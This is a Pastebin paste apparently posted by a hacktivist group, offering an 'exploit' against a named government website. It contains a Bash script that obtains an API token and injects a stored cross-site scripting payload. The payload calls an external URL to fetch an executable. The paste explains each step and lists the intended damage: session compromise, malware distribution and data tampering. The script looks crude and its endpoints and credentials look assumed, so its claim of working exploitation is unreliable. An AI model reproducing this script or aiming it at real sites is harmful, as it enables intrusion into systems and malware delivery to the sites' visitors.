Advertisement
WhosYourDaddySec

Exploit For http://mod.gov.cn

Nov 16th, 2023
171
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.22 KB | None | 0 0
  1. Exploitation Of HTTP://MOD.GOV.CN
  2.  
  3. The Bash script aims to exploit the parent website ("mod.gov.cn") through the following steps:
  4.  
  5. - The script uses hardcoded credentials (`USERNAME` and `PASSWORD`) to obtain an API token from the parent website via the `/api/getToken` endpoint, introducing a risk of unauthorized access.
  6.  
  7. - The `constructAdvancedPayload` function creates a JavaScript payload. This payload includes a script that, after a 10-second delay, sends a GET request to an external exploit URL (`EXPLOIT_URL`). The payload is designed to be injected into the parent website.
  8.  
  9. - The `sendDataWithTokenAndPayload` function sends the crafted payload and the obtained API token to the parent website's `/api/addData` endpoint, potentially injecting malicious code.
  10.  
  11. - The injected payload, once on the parent website, triggers the execution of an external exploit by making a cross-origin XMLHttpRequest to the specified `EXPLOIT_URL`.
  12.  
  13. - Upon successful execution of the exploit, a message is logged to the console, indicating that the exploit was executed successfully.
  14.  
  15. Exploitation Risks
  16.  
  17. - The hardcoded credentials pose a risk of unauthorized access to sensitive information and functionalities on the parent website.
  18.  
  19. - The crafted payload, when injected into the parent website, constitutes a Cross-Site Scripting (XSS) attack. This can manipulate user data, compromise sessions, and perform actions on behalf of users.
  20.  
  21. - The script aims to fetch and execute an external exploit (`EXPLOIT_URL`). Depending on the nature of this exploit, it could lead to the distribution of malware or compromise user systems.
  22.  
  23. - The exploit may compromise the integrity of data on the parent website by executing unauthorized actions. The lack of HTTPS communication exposes data in transit, risking confidentiality.
  24.  
  25. #!/bin/bash
  26.  
  27. BASE_URL="http://mod.gov.cn"
  28. API_ENDPOINT="/api/getToken"
  29. EXPLOIT_URL="http://example.com/exploit.exe"
  30.  
  31. getAPIToken() {
  32. local username="$1"
  33. local password="$2"
  34. curl --data "username=$username&password=$password" "$BASE_URL$API_ENDPOINT"
  35. }
  36.  
  37. constructAdvancedPayload() {
  38. local payload="<script>"
  39. payload+="function executeExploit() {"
  40. payload+=" const xhr = new XMLHttpRequest();"
  41. payload+=" xhr.open('GET', '$EXPLOIT_URL', true);"
  42. payload+=" xhr.setRequestHeader('Content-Type', 'application/json');"
  43. payload+=" xhr.withCredentials = true;"
  44. payload+=" xhr.onreadystatechange = function() {"
  45. payload+=" if (xhr.readyState == 4 && xhr.status == 200) {"
  46. payload+=" console.log('Exploit executed successfully:', xhr.responseText);"
  47. payload+=" }"
  48. payload+=" };"
  49. payload+=" xhr.send();"
  50. payload+="}"
  51. payload+="setTimeout(executeExploit, 10000);"
  52. payload+="</script>"
  53. echo "$payload"
  54. }
  55.  
  56. sendDataWithTokenAndPayload() {
  57. local APITOKEN="$1"
  58. local PAYLOAD="$2"
  59. curl --data "token=$APITOKEN&data=$PAYLOAD" "$BASE_URL/api/addData"
  60. }
  61.  
  62. automateAPIScanAndExecuteTool() {
  63. USERNAME="myuser"
  64. PASSWORD="mypassword"
  65. APITOKEN=$(getAPIToken "$USERNAME" "$PASSWORD")
  66. ADVANCED_PAYLOAD=$(constructAdvancedPayload)
  67. sendDataWithTokenAndPayload "$APITOKEN" "$ADVANCED_PAYLOAD"
  68. }
  69.  
  70. automateAPIScanAndExecuteTool
  71.  
  72. #GhostSec
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement